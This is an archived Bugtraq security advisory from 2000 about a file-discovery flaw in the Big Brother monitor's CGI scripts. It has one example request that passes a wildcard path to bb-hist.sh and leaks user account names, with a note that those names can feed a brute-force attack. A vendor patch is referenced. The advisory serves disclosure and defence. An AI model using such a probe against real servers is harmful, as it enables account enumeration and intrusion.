Date:         Tue, 21 Nov 2000 10:33:42 -0800
From: Loki <loki@F8LABS.COM>
Subject:      Big Brother Advisory - Fate Research Labs
To: BUGTRAQ@SECURITYFOCUS.COM

    -----------------.---------------------------------------------.
  /|                 |                             .               |
 / | :               : :             : :             :             |
|  | ::        ------  ::            : ::          | ::     -      |-----
|  | ::              : ::     .      :      |      | ::            :     |
|  |                 :        .      |------|      |               :     |
|  |           ------^        :      |     /       |                     .
|  ;----------"---------------^------     /  ------'---------------------
| /          /               /      /----'        /                     /
|'----------'---------------'------'     --------'---------------------'
                                www.f8labs.com





[ INTRODUCTION ]

Advisory .........: File Discovery Vulnerability
Release Date .....: 11-20-00
Application ......: bb-hist.sh
                    bb-histlog.sh
                    bb-hostsvc.sh
                    bb-rep.sh
                    bb-replog.sh
                    bb-ack.sh
Vendor Web Site ..: www.bb4.com
Versions Affected.: All installed BB CGI scripts prior to v1.5d3
Vendor Status ....: Contacted // Patch Available (Thanks Robert for
                    being so cooperative.)
WWW ..............: www.f8labs.com
SHOUTS ...........: Moo baby, Im a sexy cow, yea!




[ OVERVIEW ]

Big Brother is designed to let anyone - from omniscient Sys
Admins, to Pointy-Headed Bosses, see how the network is doing
in near real-time, from any web browser, anywhere.



[ ADVISORY ]

Vulnerabilities exists such that someone can identify if sensitive
files exists and determine user ids on the BBDISPLAY server(s)
and use those to launch a password brute-force attack.
e.g. http://www.victim.com/cgi-bin/bb-hist.sh?HISTFILE=/home/*

history
Mon Nov 20 22:07:25 EST 2000

Error reading history file [adam]

Utilizing this information, we are able to then validate not
only if sensitive files exist on the system, but also, valid
user accounts for a further brute-force attack on the system.



[ RESOURCES ]

Patch Details
http://bb4.com/incident.nov21

Big Brother Technologies
http://www.bb4.com

Fate Research Labs
http://www.f8labs.com



================================================================
Loki
Fate Research Labs
loki@f8labs.com
----------------------------------------------------------------
BEGIN PGP SIGNATURE

iQA/AwUBOfZvfGnwBJRV5bxfEQJu7gCfQ/T0O9u75nzRGWVSeurNmnFRVr8Anj0c
M+UXhPDBvsm+ffRpv41zevQN
=3IRx
================================================================